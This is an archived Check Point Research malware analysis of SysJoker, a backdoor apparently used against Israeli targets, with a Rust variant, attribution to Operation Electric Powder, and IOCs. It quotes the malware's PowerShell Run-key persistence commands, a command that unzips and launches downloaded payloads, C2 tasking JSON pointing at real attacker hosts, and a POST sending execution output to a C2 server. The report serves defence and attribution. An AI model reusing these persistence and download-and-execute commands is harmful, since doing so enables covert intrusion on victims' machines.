{
	"id": "db7224ca-dced-4aff-8474-e130b7326d58",
	"created_at": "2026-04-10T03:20:27.883436Z",
	"updated_at": "2026-04-10T13:11:55.813367Z",
	"deleted_at": null,
	"sha1_hash": "ce88544b8559846a62eac4ab406aeef2c9ddff50",
	"title": "Israel-Hamas War Spotlight: Shaking the Rust Off SysJoker",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 132536,
	"plain_text": "Israel-Hamas War Spotlight: Shaking the Rust Off SysJoker\r\nBy etal\r\nPublished: 2023-11-23 · Archived: 2026-04-10 02:40:32 UTC\r\nKey Findings\r\nCheck Point Research is actively tracking the evolution of SysJoker, a previously publicly unattributed multi-platform backdoor, which we asses was utilized by a Hamas-affiliated APT to target Israel.\r\nAmong the most prominent changes is the shift to Rust language, which indicates the malware code was entirely\r\nrewritten, while still maintaining similar functionalities. In addition, the threat actor moved to using OneDrive\r\ninstead of Google Drive to store dynamic C2 (command and control server) URLs.\r\nAnalysis of newly discovered variants of SysJoker revealed ties to previously undisclosed samples of Operation\r\nElectric Powder, a set of targeted attacks against Israeli organizations between 2016-2017 that were loosely linked to\r\nthe threat actor known as Gaza Cybergang.\r\nIntroduction\r\nAmid tensions in the ongoing Israel-Hamas war, Check Point Research has been conducting active threat hunting in an\r\neffort to discover, attribute, and mitigate relevant regional threats. Among those, some new variants of the SysJoker\r\nmalware, including one coded in Rust, recently caught our attention. Our assessment is that these were used in targeted\r\nattacks by a Hamas-related threat actor.\r\nSysJoker, initially discovered by Intezer in 2021, is a multi-platform backdoor with multiple variants for Windows, Linux\r\nand Mac. The same malware was also analyzed in another report a few months after the original publication. Since then,\r\nSysJoker Windows variants have evolved enough to stay under the radar.\r\nAs we investigated the newer variants of SysJoker that were utilized in targeted attacks in 2023, we also discovered a variant\r\nwritten in Rust, which suggests the malware code was completely rewritten. In addition, we also uncovered behavioral\r\nsimilarities with another campaign named Operation Electric Powder which targeted Israel in 2016-2017. This campaign\r\nwas previously linked to Gaza Cybergang (aka Molerats), a threat actor operating in conjunction with Palestinian interests.\r\nIn this article, we drill down into the Rust version of SysJoker, as well as disclose additional information on other SysJoker\r\nWindows variants and their attribution.\r\nRust SysJoker Variant\r\nThe SysJoker variant ( 9416d7dc2ecdeda92ba35cd5e54eb044 ), written in Rust, was submitted to VirusTotal with the\r\nname  php-cgi.exe  on October 12, 2023. Compiled a few months earlier on August 7, it contains the following PDB\r\npath:  C:\\Code\\Rust\\RustDown-Belal\\target\\release\\deps\\RustDown.pdb .\r\nThe malware employs random sleep intervals at various stages of its execution, which may serve as possible anti-sandbox or\r\nanti-analysis measures.\r\nThe sample has two modes of operation which are determined by its presence in a particular path. This is intended to\r\ndifferentiate the first execution from any subsequent ones based on persistence.\r\nFirst, it checks whether the current running module matches the path  C:\\ProgramData\\php-7.4.19-Win32-vc15-x64\\php-cgi.exe . Based on the outcome the malware proceeds to one of the two possible stages.\r\nFirst execution\r\nIf the sample runs from a different location, indicating it’s the first time the sample is executed, the malware copies itself to\r\nthe path  C:\\ProgramData\\php-7.4.19-Win32-vc15-x64\\php-cgi.exe  and then runs itself from the newly created path using\r\nPowerShell with the following parameter:\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\n-Command C:\\ProgramData\\php-7.4.19-Win32-vc15-x64\\php-cgi.exe\r\n-Command C:\\ProgramData\\php-7.4.19-Win32-vc15-x64\\php-cgi.exe\r\nhttps://research.checkpoint.com/2023/israel-hamas-war-spotlight-shaking-the-rust-off-sysjoker/\r\nPage 1 of 10\n\n-Command C:\\ProgramData\\php-7.4.19-Win32-vc15-x64\\php-cgi.exe\r\nFinally, it creates a persistence mechanism and then exits the program.\r\nPersistence is established in an unusual way, using PowerShell with the following argument:\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\n-Command \"$reg=[WMIClass]'ROOT\\DEFAULT:StdRegProv';\r\n$results=$reg.SetStringValue('\u0026amp;H80000001','Software\\Microsoft\\Windows\\CurrentVersion\\Run', 'php-cgi',\r\n'C:\\ProgramData\\php-7.4.19-Win32-vc15-x64\\php-cgi.exe');\"\r\n-Command \"$reg=[WMIClass]'ROOT\\DEFAULT:StdRegProv';\r\n$results=$reg.SetStringValue('\u0026amp;H80000001','Software\\Microsoft\\Windows\\CurrentVersion\\Run', 'php-cgi',\r\n'C:\\ProgramData\\php-7.4.19-Win32-vc15-x64\\php-cgi.exe');\"\r\n-Command \"$reg=[WMIClass]'ROOT\\DEFAULT:StdRegProv';\r\n$results=$reg.SetStringValue('\u0026amp;H80000001','Software\\Microsoft\\Windows\\CurrentVersion\\Run', 'php-cgi', 'C:\\\r\nEventually, this PowerShell code creates a registry  Run  key in the  HKEY_CURRENT_USER  hive, which points to the copy of\r\nthe executable, using the WMI StdRegPro class instead of directly accessing the registry via the Windows API or reg.exe.\r\nSubsequent executions (from persistence)\r\nSysJoker contacts a URL on OneDrive to retrieve the C2 server address. The URL is hardcoded and encrypted inside the\r\nbinary:\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\nhttps://onedrive.live[.]com/download?resid=16E2AEE4B7A8BBB1%21112\u0026amp;authkey=!AED7TeCJaC7JNVQ\r\nhttps://onedrive.live[.]com/download?resid=16E2AEE4B7A8BBB1%21112\u0026amp;authkey=!AED7TeCJaC7JNVQ\r\nhttps://onedrive.live[.]com/download?resid=16E2AEE4B7A8BBB1%21112\u0026amp;authkey=!AED7TeCJaC7JNVQ\r\nThe response should contain also a XOR-encrypted blob of data that is encoded in base64. During our investigation, the\r\nfollowing response was received:\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\nKnM5Sjpob2glNTY8AmcaYXt8cAh/fHZ+ZnUNcwdld2Mr\r\nKnM5Sjpob2glNTY8AmcaYXt8cAh/fHZ+ZnUNcwdld2Mr\r\nKnM5Sjpob2glNTY8AmcaYXt8cAh/fHZ+ZnUNcwdld2Mr\r\nAfter decryption, the C2 IP address and port are revealed:\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nhttps://research.checkpoint.com/2023/israel-hamas-war-spotlight-shaking-the-rust-off-sysjoker/\r\nPage 2 of 10\n\nEnlighterJS 3 Syntax Highlighter\r\n{\"url\":\"http://85.31.231[.]49:443\"}\r\n{\"url\":\"http://85.31.231[.]49:443\"}\r\n{\"url\":\"http://85.31.231[.]49:443\"}\r\nUsing OneDrive allows the attackers to easily change the C2 address, which enables them to stay ahead of different\r\nreputation-based services. This behavior remains consistent across different versions of SysJoker.\r\nThe malware collects information about the infected system, including the Windows version, username, MAC address, and\r\nvarious other data. This information is then sent to the  /api/attach  API endpoint on the C2 server, and in response it\r\nreceives a unique token that serves as an identifier when the malware communicates with the C2:\r\nFigure 1 - Bot registration api call.\r\nFigure 1 – Bot registration api call.\r\nAfter registration with the C2 server, the sample runs the main C2 loop. It sends a POST request containing the unique token\r\nto the  /api/req  endpoint, and the C2 responds with JSON data:\r\nFigure 2 - Command request and response.\r\nFigure 2 – Command request and response.\r\nThe expected response from the server is a JSON that contains a field named  data  that contains an array of actions for the\r\nsample to execute. Each array consists of  id  and  request  fields. The  request  field is another JSON with fields\r\ncalled  url  and  name . An example of the response from the server:\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\n{\"data\":[{\"id\":\"1\", \"request\":\"{\"url\": \"http://85.31.231[.]49/archive_path\", \"name\":\"mal_1.exe\"}\"}, {\"id\":\"2\", \"request\":\"\r\n{\"url\": \"http://85.31.231[.]49/archive_path\", \"name\":\"mal_2.exe\"}\"}]}\r\n{\"data\":[{\"id\":\"1\", \"request\":\"{\"url\": \"http://85.31.231[.]49/archive_path\", \"name\":\"mal_1.exe\"}\"}, {\"id\":\"2\", \"request\":\"\r\n{\"url\": \"http://85.31.231[.]49/archive_path\", \"name\":\"mal_2.exe\"}\"}]}\r\n{\"data\":[{\"id\":\"1\", \"request\":\"{\"url\": \"http://85.31.231[.]49/archive_path\", \"name\":\"mal_1.exe\"}\"}, {\"id\":\"2\"\r\nThe malware downloads a zip archive from the URL specified in the  url  field. The archive contains an executable that\r\nafter unzipping is saved as the  name  field into  C:\\ProgramData\\php-Win32-libs  folder. The archive is unzipped using the\r\nfollowing PowerShell command:\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\npowershell -Command Expand-Archive -Path C:\\ProgramData\\php-Win32-libs\\XMfmF.zip -DestinationPath\r\nC:\\ProgramData\\php-Win32-libs ; start C:\\ProgramData\\php-Win32-libs\\exe_name.exe\r\npowershell -Command Expand-Archive -Path C:\\ProgramData\\php-Win32-libs\\XMfmF.zip -DestinationPath\r\nC:\\ProgramData\\php-Win32-libs ; start C:\\ProgramData\\php-Win32-libs\\exe_name.exe\r\npowershell -Command Expand-Archive -Path C:\\ProgramData\\php-Win32-libs\\XMfmF.zip -DestinationPath C:\\ProgramDa\r\nIt is important to mention that in previous SysJoker operations, the malware also had the ability not only to download and\r\nexecute remote files from an archive but also to execute commands dictated by the operators. This functionality is missing in\r\nthe Rust version. After receiving and executing the file download command, depending on whether the operation was\r\nsuccessful or not, the malware contacts the C2 server again and send a success or exception message to the\r\npath  /api/req/res . The server sends back a JSON confirmation indicating that it has received the\r\ninformation:  {\"status\":\"success\"} .\r\nhttps://research.checkpoint.com/2023/israel-hamas-war-spotlight-shaking-the-rust-off-sysjoker/\r\nPage 3 of 10\n\nEncryption\r\nThe malware has two methods for string decryption. The first method is simple and appears across multiple SysJoker\r\nvariants. The sample contains several base64-encoded encrypted data blobs and a base64-encoded key. Upon decryption,\r\nboth blobs are base64-decoded and then XORed to produce the plain text strings.\r\nThe second encryption method is tedious and is spliced in-line throughout the program repeatedly at compile time. This\r\ngenerates a complex string decryption algorithm throughout the sample.\r\nFigure 3 - Example of the decryption of the string “php-”.\r\nFigure 3 – Example of the decryption of the string “php-”.\r\nWindows SysJoker Variants\r\nIn addition to the newly found Rust variant, we uncovered two more SysJoker samples that were not publicly exposed in the\r\npast. Both of these samples are slightly more complex than the Rust version or any of the previously analyzed samples,\r\npossibly due to the public discovery and analysis of the malware. One of these samples, in contrast to other versions, has a\r\nmulti-stage execution flow, consisting of a downloader, an installer, and a separate payload DLL.\r\nDMADevice variant\r\nThe DMADevice sample ( d51e617fe1c1962801ad5332163717bb ) was compiled in May 2022, a few months after SysJoker\r\nwas first uncovered.\r\nLike other versions, the malware starts by retrieving the C2 server address by contacting the URL: \r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\nhttps://onedrive.live[.]com/download?\r\ncid=F6A7DCE38A4B8570\u0026amp;resid=F6A7DCE38A4B8570!115\u0026amp;authkey=AKcf8zLcDneJZHw\r\nhttps://onedrive.live[.]com/download?\r\ncid=F6A7DCE38A4B8570\u0026amp;resid=F6A7DCE38A4B8570!115\u0026amp;authkey=AKcf8zLcDneJZHw\r\nhttps://onedrive.live[.]com/download?cid=F6A7DCE38A4B8570\u0026amp;resid=F6A7DCE38A4B8570!115\u0026amp;authkey=AKcf8zLcD\r\nThe OneDrive link responds with an encrypted base64-encoded string, which is decrypted with the XOR\r\nkey  QQL8VJUJMABL8H5YNRC9QNEOHA4I3QDAVWP5RY9L0HCGWZ4T7GTYQTCQTHTTN8RV6BMKT3AICZHOFQS8MTT . This is the same key\r\nthat is used in the Rust version.\r\nThe decrypted blob contains a JSON with the C2 domain in the following format:\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\n{\"url\":\"http://sharing-u-file[.]com\"}\r\n{\"url\":\"http://sharing-u-file[.]com\"}\r\n{\"url\":\"http://sharing-u-file[.]com\"}\r\nNext, the malware proceeds to the three-stage execution process.\r\n1. Setup files and persistence\r\nThe sample generates a unique bot ID, sends it in a POST request to the  /api/cc  API endpoint, and receives back the\r\nJSON describing the desired malware setup on the infected machine.\r\nThe JSON has the following structure:\r\nPlain text\r\nhttps://research.checkpoint.com/2023/israel-hamas-war-spotlight-shaking-the-rust-off-sysjoker/\r\nPage 4 of 10\n\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\n{\"key\":\"f57d611b-0779-4125-a3e8-\r\n4f8ca3116509\",\"pi\":\"VwUD[REDACTED]\",\"data\":\"PRdkHUVFVA9pQl5BXA8YE2JHQgZBBFVpVRJZQU0RdXx3cVVPD1ZSRhoTdS9sY1hbTFldX\r\n{\"key\":\"f57d611b-0779-4125-a3e8-\r\n4f8ca3116509\",\"pi\":\"VwUD[REDACTED]\",\"data\":\"PRdkHUVFVA9pQl5BXA8YE2JHQgZBBFVpVRJZQU0RdXx3cVVPD1ZSRhoTdS9sY1hbTFldX\r\n{\"key\":\"f57d611b-0779-4125-a3e8-4f8ca3116509\",\"pi\":\"VwUD[REDACTED]\",\"data\":\"PRdkHUVFVA9pQl5BXA8YE2JHQgZBBFVpVR\r\nThe field  key  in the JSON is used to XOR-decrypt the other fields after they are base64-decoded: the  pi  field contains\r\nthe victim’s IP address and the  data  field contains the array with multiple values:\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\n[\"SystemDrive\",\"ProgramData\",\"DMADevice\",\"DMASolutionInc\",\"DMASolutionInc.exe\",\"DMASolutionInc.dll\",\"powershell.exe\",\"cmd\",\"open\",\"start\"\r\nREG ADD HKCU\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run \\/V\",\"\\/t REG_SZ \\/D\",\".exe\",\"$env:username\r\n| Out-File -Encoding 'utf8' '\",\"SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\"]\r\n[\"SystemDrive\",\"ProgramData\",\"DMADevice\",\"DMASolutionInc\",\"DMASolutionInc.exe\",\"DMASolutionInc.dll\",\"powershell.exe\",\"cmd\",\"open\",\"start\"\r\nREG ADD HKCU\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run \\/V\",\"\\/t REG_SZ \\/D\",\".exe\",\"$env:username\r\n| Out-File -Encoding 'utf8' '\",\"SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\"]\r\n[\"SystemDrive\",\"ProgramData\",\"DMADevice\",\"DMASolutionInc\",\"DMASolutionInc.exe\",\"DMASolutionInc.dll\",\"powershel\r\nThose values are utilized in the following order:\r\nSystemDrive  – Get the system hard drive letter.\r\nProgramData  – Create these two folders under the specified (in this case, ProgramData) folder:\r\n– DMADevice  – The first folder name created.\r\n– DMASolutionInc.exe  – The file name used by the currently running executable to self-replicate into\r\nthe  DMADevice  folder.\r\nDMASolutionInc.dll  – The name of the config file.\r\nDMASolutionInc  – The second folder name created.\r\nThe rest of the values are used in a few commands that establish persistence via the registry  Run  key and retrieve the\r\ncurrent user name from  $env  into the temporary txt file.\r\nThe config file, in our case  DMASolutionInc.dll , is stored on a disk encrypted (using the same key used to decrypt the\r\ndomain) and base64-encoded. It contains encrypted JSON with the following fields:\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\n{\"id\":\"[BOT-ID]\",\"us\":\"[USERNAME]\",\"ip\":\"[IP]\"}\r\n{\"id\":\"[BOT-ID]\",\"us\":\"[USERNAME]\",\"ip\":\"[IP]\"}\r\n{\"id\":\"[BOT-ID]\",\"us\":\"[USERNAME]\",\"ip\":\"[IP]\"}\r\nAfter performing all these operations, the sample executes its copy from  DMASolutionInc.exe  and exits.\r\n2. Register with the C2 server\r\nWhen the sample is executed again (via persistence from the previous stage), it checks the location it is running from. It then\r\ncontinues the execution by making a POST request to  /api/add  containing the uuid, user name, and user token, which is\r\nhttps://research.checkpoint.com/2023/israel-hamas-war-spotlight-shaking-the-rust-off-sysjoker/\r\nPage 5 of 10\n\nalso generated by the malware:\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\nuuid=bot-id\u0026nu=username\u0026user_token=token\r\nuuid=bot-id\u0026nu=username\u0026user_token=token\r\nuuid=bot-id\u0026nu=username\u0026user_token=token\r\nThe server responds with a token generated on its side which is then used for all the subsequent C2 requests.\r\n3. C2 main loop\r\nThe token received during the previous stage is used for making POST requests to  /api/cr  on the C2 server to retrieve the\r\ncommands to execute.\r\nSimilar to other SysJoker variants, the server responds with a JSON that contains field  data  which is an array of actions to\r\ntake. This version can download and execute files or run commands and upload the results to the C2 server. For each\r\ncommand in the array, the sample sends a response reporting if it was successful or not.\r\nAppMessagingRegistrar variant\r\nThis variant has a compilation timestamp of June 2022 and has a quite different execution flow. The functionality of the\r\nmalware is divided into two separate components: a downloader (DDN,  c2848b4e34b45e095bd8e764ca1a4fdd ) and a\r\nbackdoor (AppMessagingRegistrar,  31c2813c1fb1e42b85014b2fc3fe0666 ).\r\nDDN Downloader\r\nThe threat actors first deliver a lightweight downloader. It creates the folder C:\\ProgramData\\NuGet Library\\ , then\r\ndownloads a zip file from  https://filestorage-short[.]org/drive/AppMessagingRegistrar.zip . It unzips the file,\r\ncopies it into the  AppMessagingRegistrar.exe  file and then executes it.\r\nSplitting the functionality into separate components has proved effective: at the time of the first submission to VirusTotal\r\n(VT), the malware was not detected by any of the platform’s engines:\r\nFigure 4 - DNN downloader with 0 detections on its first submission to VT (2023-04-09).\r\nFigure 4 – DNN downloader with 0 detections on its first submission to VT (2023-04-09).\r\nAppMessagingRegistratar\r\nUpon execution, this payload first checks the registry key  SOFTWARE\\Intel\\UNP\\ProgramUpdates\\UUID  for the UUID of the\r\nPC. If the registry key is not available, a UUID is generated using the  UuidCreate  function and is then saved to the\r\npreviously mentioned key.\r\nFigure 5 - Uuid Generation.\r\nFigure 5 – Uuid Generation.\r\nThe variant then proceeds to decrypt a hardcoded OneDrive URL to retrieve a C2 address. The XOR key in this sample\r\nis  22GC18YH0N4RUE0BSJOAVW24624ULHIQGS4Y1BQQUZYTENJN2GBERQBFKF2W78H7 .\r\nAfter the C2 address is decrypted, a POST request is made to the C2 server API endpoint  /api/register  which contains\r\nthe previously generated UUID.\r\nThe server responds with a JSON containing a token and a status message: \r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\n{\"status\": \"success\", \"token\":\"[TOKEN]\", \"status_num\":1}\r\n{\"status\": \"success\", \"token\":\"[TOKEN]\", \"status_num\":1}\r\nhttps://research.checkpoint.com/2023/israel-hamas-war-spotlight-shaking-the-rust-off-sysjoker/\r\nPage 6 of 10\n\n{\"status\": \"success\", \"token\":\"[TOKEN]\", \"status_num\":1}\r\nThe status indicates if the request was valid or not, and the samples check specifically for the string  “success” .\r\nThe token is used for all the following C2 requests but unlike all the other samples, instead of using the body of requests, it\r\nis sent in the Authorization header:  Authorization: Bearer [TOKEN] . This change could be to accommodate additional\r\nflows in the malware execution (discussed below) in which the malware sends a GET request instead of a POST and\r\nrequires a mechanism for the server to identify the sender.\r\nThe  status_num  field is used as a global flag to indicate what actions the bot should take. There are four statuses available:\r\nStatus Number Action Description\r\n0 Setup Download MsoftInit.dll and execute the init and step exports.\r\n1 Idle loop Wait for status_num to change.\r\n3 Payload retrieval Download and save MsoftNotify.dll DLL.\r\n4 Payload execution Execute MsoftNotify.dll DLL.\r\nSetup phase\r\nIf the received  status_num  is 0, the malware creates\r\nthe  C:\\ProgramData\\Intel\\UNP\\ProgramUpdates  and  C:\\ProgramData\\Intel\\Drivers\\MsoftUpdates  folders. It then\r\nproceeds to:\r\n1. Download a DLL file using the function  UrlDownloadToFileW  from the path  /api/library/[TOKEN]  and save it\r\nto  C:\\ProgramData\\Intel\\Drivers\\MsoftUpdates\\MsoftInit.dll .\r\n2. Load the  MsoftInit.dll  and call the  init  exported function.\r\n3. Load the same DLL again and call the  step  exported function.\r\nThe exact purpose of those functions is unknown as we were not able to retrieve the DLL. However, due to the names and\r\nour analysis of previous versions of the malware, we believe they were part of the persistence and setup process. Finally, the\r\nmalware sends an empty POST request to the API endpoint  /api/update . The expected response from the server is an\r\nempty JSON.\r\nIdle loop\r\nIf the  status_num  is 1, the malware continues to make requests to the C2 API endpoint  /api/status  in an infinite loop.\r\nTo break the loop, the  status_num  must change.\r\nMain payload download\r\nIf the  status_num  is 3, the malware proceeds to download a DLL file from URL  /api/library/[TOKEN]  and saves it to\r\nthe path  C:\\ProgramData\\Intel\\Drivers\\MsoftUpdates\\MsoftNotify.dll . It then sends a request to the C2 API\r\nendpoint  /api/ready : if the server responds with a status  success,  the status flag is then set to 4.\r\nPayload execution\r\nIf the status is 4, the malware proceeds to make a GET request to the C2 API endpoint  /api/requests . The C2 server\r\nresponds with a JSON with 3 parameters,  id ,  r , and  k .\r\nThe malware then loads the  MsoftNotify.dll  DLL and resolves the function  st . The  r  and  k  values sent from the\r\nserver are used by  st  as parameters. We were not able to retrieve the DLL, but based on the previous versions, this is\r\nlikely a version of the main command running functionality for the backdoor, and its return value should be a string. After\r\nthe function runs and returns a result, the  id  received in the token is used in the POST request to the C2 which contains the\r\noutput:\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\nPOST /api/requests/[ID] HTTP/1.1\r\nHost: [62.108.40.129]\r\n(https://www.virustotal.com/gui/url/79fde5d4b19cbd1f920535215c558b6ff63973b7af7d6bd488e256821711e0b1)\r\nAccept: application/json\r\nAuthorization: Bearer [TOKEN]\r\nhttps://research.checkpoint.com/2023/israel-hamas-war-spotlight-shaking-the-rust-off-sysjoker/\r\nPage 7 of 10\n\nContent-Length: 15\r\nContent-Type: application/x-www-form-urlencoded\r\nresponse=[EXECUTION OUTPUT]\r\nPOST /api/requests/[ID] HTTP/1.1 Host: [62.108.40.129]\r\n(https://www.virustotal.com/gui/url/79fde5d4b19cbd1f920535215c558b6ff63973b7af7d6bd488e256821711e0b1) Accept:\r\napplication/json Authorization: Bearer [TOKEN] Content-Length: 15 Content-Type: application/x-www-form-urlencoded\r\nresponse=[EXECUTION OUTPUT]\r\nPOST /api/requests/[ID] HTTP/1.1\r\nHost: [62.108.40.129](https://www.virustotal.com/gui/url/79fde5d4b19cbd1f920535215c558b6ff63973b7af7d6bd488e25\r\nAccept: application/json\r\nAuthorization: Bearer [TOKEN]\r\nContent-Length: 15\r\nContent-Type: application/x-www-form-urlencoded\r\nresponse=[EXECUTION OUTPUT]\r\nInfrastructure\r\nThe infrastructure used in this campaign is configured dynamically. First, the malware contacts a OneDrive address, and\r\nfrom there, it decrypts the JSON containing the C2 address with which to communicate. The C2 address is encrypted with a\r\nhardcoded XOR key and base64-encoded.\r\nThis threat actor commonly uses cloud storage services. Previous reports show Google Drive was used for the same purpose.\r\nFigure 6 - Metadata of OneDrive file containing the encrypted C2 server.\r\nFigure 6 – Metadata of OneDrive file containing the encrypted C2 server.\r\nTies to Operation Electric Powder\r\nThe SysJoker backdoor uses its own custom encryption for three main strings: the OneDrive URL containing the final C2\r\naddress, the C2 address received from the request to OneDrive, and a PowerShell command used for persistence:\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\n$reg=[WMIClass]'ROOT\\DEFAULT:StdRegProv';\r\n$results=$reg.SetStringValue('\u0026H80000001','Software\\Microsoft\\Windows\\CurrentVersion\\Run'[TRUNCATED]\r\n$reg=[WMIClass]'ROOT\\DEFAULT:StdRegProv';\r\n$results=$reg.SetStringValue('\u0026H80000001','Software\\Microsoft\\Windows\\CurrentVersion\\Run'[TRUNCATED]\r\n$reg=[WMIClass]'ROOT\\DEFAULT:StdRegProv';\r\n$results=$reg.SetStringValue('\u0026H80000001','Software\\Microsoft\\Windows\\CurrentVersion\\Run'[TRUNCATED]\r\nThis PowerShell command based on the StdRegProv WMI class is quite unique. It is shared between multiple variants of\r\nSysJoker and only appears to be shared with one other campaign, associated with Operation Electric Powder previously\r\nreported by ClearSky.\r\nThe 2017 report describes the persistent activity carried out in 2016-2017 against the Israel Electric Company (IEC). This\r\noperation used phishing and fake Facebook pages to deliver both Windows and Android malware. Windows malware used in\r\nthis campaign consisted of a dropper, a main backdoor, and a Python-based keylogging and screen-grabbing module.\r\nThroughout our analysis of the SysJoker operation, we saw indications suggesting that the same actor is responsible for\r\nboth attacks, despite the large time gap between the operations. Both campaigns used API-themed URLs and implemented\r\nscript commands in a similar fashion. This includes the  Run  registry value but is not the only common factor. For example,\r\nthe following image shows the similarities between the commands used by different malware when gathering recon data\r\nfrom the infected device to temporary text files:\r\nFigure 7 - Use of the \u003ccode\u003etype\u003c/code\u003e command in Electric Powder → the original SysJoker→\r\nDMADevice SysJoker variant.\r\nhttps://research.checkpoint.com/2023/israel-hamas-war-spotlight-shaking-the-rust-off-sysjoker/\r\nPage 8 of 10\n\nFigure 7 – Use of the  type  command in Electric Powder → the original SysJoker → DMADevice SysJoker\r\nvariant.\r\nConclusion\r\nAlthough the SysJoker malware, which was first seen in 2021 and publicly described in 2022, wasn’t attributed to any\r\nknown actor, we found evidence that this tool and its newer variants have been used as part of the Israeli-Hamas conflict. We\r\nwere also able to make a connection between SysJoker and the 2016-2017 Electric Powder Operation against Israel Electric\r\nCompany.\r\nIn our report, we described the evolution of the malware and the changes in the complexity of its execution flow, as well as\r\nits latest shift to the Rust language and the latest infrastructure it uses.\r\nThe earlier versions of the malware were coded in C++. Since there is no straightforward method to port that code to Rust, it\r\nsuggests that the malware underwent a complete rewrite and may potentially serve as a foundation for future changes and\r\nimprovements.\r\nCheck Point Customers Remain Protected\r\nCheck Point Customers remain protected against attacks detailed in this report, while using Check Point Anti-Bot, Harmony\r\nEndpoint and Threat Emulation.\r\nThreat Emulation\r\nBackdoor.Wins.Sysjoker.ta.R\r\nBackdoor.Wins.Sysjoker.ta.Q\r\nBackdoor.Wins.Sysjoker.ta.P\r\nBackdoor.Wins.Sysjoker.ta.O\r\nBackdoor.Wins.Sysjoker.ta.N\r\nBackdoor.Wins.Sysjoker.ta.M\r\nBackdoor.Wins.Sysjoker.ta.L\r\nHarmony Endpoint\r\nBackdoor.Win.SysJoker.H\r\nBackdoor_Linux_SysJoker_A/B/C/D/E/F\r\nCheck Point Anti-Bot\r\nBackdoor.WIN32.SysJoker.A\r\nBackdoor.WIN32.SysJoker.B\r\nBackdoor.WIN32.SysJoker.C\r\nIOCs\r\nInfrastructure\r\n85.31.231[.]49\r\nsharing-u-file[.]com\r\nfilestorage-short[.]org\r\naudiosound-visual[.]com\r\n62.108.40[.]129\r\nHashes\r\nd4095f8b2fd0e6deb605baa1530c32336298afd026afc0f41030fa43371e3e72\r\n6c8471e8c37e0a3d608184147f89d81d62f9442541a04d15d9ead0b3e0862d95\r\ne076e9893adb0c6d0c70cd7019a266d5fd02b429c01cfe51329b2318e9239836\r\n96dc31cf0f9e7e59b4e00627f9c7f7a8cac3b8f4338b27d713b0aaf6abacfe6f\r\n67ddd2af9a8ca3f92bda17bd990e0f3c4ab1d9bea47333fe31205eede8ecc706\r\n0ff6ff167c71b86c511c36cba8f75d1d5209710907a807667f97ce323df9c4ba\r\nhttps://research.checkpoint.com/2023/israel-hamas-war-spotlight-shaking-the-rust-off-sysjoker/\r\nPage 9 of 10\n\nSource: https://research.checkpoint.com/2023/israel-hamas-war-spotlight-shaking-the-rust-off-sysjoker/\r\nhttps://research.checkpoint.com/2023/israel-hamas-war-spotlight-shaking-the-rust-off-sysjoker/\r\nPage 10 of 10",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://research.checkpoint.com/2023/israel-hamas-war-spotlight-shaking-the-rust-off-sysjoker/"
	],
	"report_names": [
		"israel-hamas-war-spotlight-shaking-the-rust-off-sysjoker"
	],
	"threat_actors": [],
	"ts_created_at": 1775791227,
	"ts_updated_at": 1775826715,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ce88544b8559846a62eac4ab406aeef2c9ddff50.pdf",
		"text": "https://archive.orkl.eu/ce88544b8559846a62eac4ab406aeef2c9ddff50.txt",
		"img": "https://archive.orkl.eu/ce88544b8559846a62eac4ab406aeef2c9ddff50.jpg"
	}
}